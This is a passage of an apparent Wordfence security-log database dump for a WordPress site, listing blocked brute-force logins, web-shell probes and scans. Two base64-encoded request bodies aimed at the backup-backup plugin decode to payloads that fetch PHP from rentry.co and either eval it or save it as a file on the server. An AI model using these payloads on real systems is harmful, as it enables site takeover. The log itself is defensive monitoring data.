AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvY2FjaGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(14276,0.000000,1704535550.036089,'\0\0\0\0\0\0\0\0\0\0>B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14277,0.000000,1704536045.892784,'\0\0\0\0\0\0\0\0\0\0ǽ{',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14254,1704521707.400982,1704521707.299000,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14275,0.000000,1704535115.293744,'\0\0\0\0\0\0\0\0\0\03d',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14274,0.000000,1704533973.197647,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14255,1704521697.064291,1704521696.965700,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/images/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14210,0.000000,1704500979.207694,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14211,0.000000,1704501039.313463,'\0\0\0\0\0\0\0\0\0\0m$n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14272,0.000000,1704531517.001977,'\0\0\0\0\0\0\0\0\0\0@*+',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14273,0.000000,1704532265.582032,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14212,0.000000,1704502702.446188,' A\0$T\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14213,0.000000,1704503160.547441,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14214,0.000000,1704503315.837422,'&\0\0\0\0\0 \0',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','loginFailValidUsername',NULL,NULL),(14215,0.000000,1704504374.675851,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14216,0.000000,1704506041.227282,'$\0a\0\0\0\0\0\0z ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14217,0.000000,1704509393.232367,'\0\0\0\0\0\0\0\0\0\0U[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14218,0.000000,1704510036.461496,'*!\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14219,1704510335.939068,1704510335.862700,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-content/plugins/mw-wp-form/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tdy13cC1mb3JtL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tdy13cC1mb3JtL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14325,0.000000,1704572234.656713,'*\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14326,1704572284.451697,1704572284.359600,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/inputs.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14247,1704517121.611799,1704517121.536600,'\0\0\0\0\0\0\0\0\0\0S',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/CTY@x7root.php','https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/CTY@x7root.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2Fkc10=\",\"paramValue\":\"ZzQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL0NUWUB4N3Jvb3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(14300,1704552002.116828,1704552001.954600,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14220,1704510335.938474,1704510335.862700,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-content/plugins/mw-wp-form/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tdy13cC1mb3JtL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tdy13cC1mb3JtL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14221,1704510952.513970,1704510952.445400,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/wp-pridmag/up.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3dwLXByaWRtYWcvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14246,1704517591.244038,1704517591.155600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14222,1704510932.721699,1704510932.619300,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/tflow/up.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3RmbG93L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14209,1704500802.423194,1704500802.379500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vLi4vd3AtZ2l0bi5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14323,0.000000,1704570591.849832,'\0\0\0\0\0\0\0\0\0\0>6;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14324,0.000000,1704570627.881153,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14223,1704510869.651089,1704510869.592700,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/zero.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3plcm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14241,0.000000,1704516040.886202,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14224,1704510865.681048,1704510865.614800,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/classwithtostring.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzd2l0aHRvc3RyaW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14242,0.000000,1704516206.249047,'\0\0\0\0\0\0\0\0\0\06%#',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14240,0.000000,1704514384.066279,'\0\0\0\0\0\0\0\0\0\06%',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14243,1704517601.389802,1704517601.290000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/autoload_classmap.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14225,1704510858.797943,1704510858.741900,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/simple.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14279,0.000000,1704537597.484383,'\0\0\0\0\0\0\0\0\0\0b>a',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14280,0.000000,1704538140.443183,'\0\0\0\0\0\0\0\0\0\0-=',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14281,0.000000,1704538863.202772,'\0\0\0\0\0\0\0\0\0\0^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14282,0.000000,1704540524.192739,'\0\0\0\0\0\0\0\0\0\0\\P',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14283,0.000000,1704541007.462059,'\0\0\0\0\0\0\0\0\0\0՘#',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14284,0.000000,1704541115.887949,'\0\0\0\0\0\0\0\0\0\0[-',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14285,0.000000,1704542183.956627,'\0\0\0\0\0\0\0\0\0\0S#@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14286,0.000000,1704543855.007857,'\0\0\0\0\0\0\0\0\0\0#B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14287,0.000000,1704545238.854692,'\0\0\0\0\0\0\0\0\0\0Kݫ',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14204,1704500796.208233,1704500796.164400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"Y3VybCAtbyAuLi8uLi8uLi91cGxvYWRzL3dwLXR1aG4ucGhwIGh0dHBzOi8vcmVudHJ5LmNvL201bjd3ZS9yYXc=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14288,0.000000,1704545518.971531,'\0\0\0\0\0\0\0\0\0\0\rO',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14289,0.000000,1704547191.301069,' A\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14290,0.000000,1704547374.724239,'\0\0\0\0\0\0\0\0\0\0X',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0','loginFailInvalidUsername',NULL,NULL),(14291,1704548383.956865,1704548383.872300,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14299,1704552019.345038,1704552019.245700,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/twentyfive/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 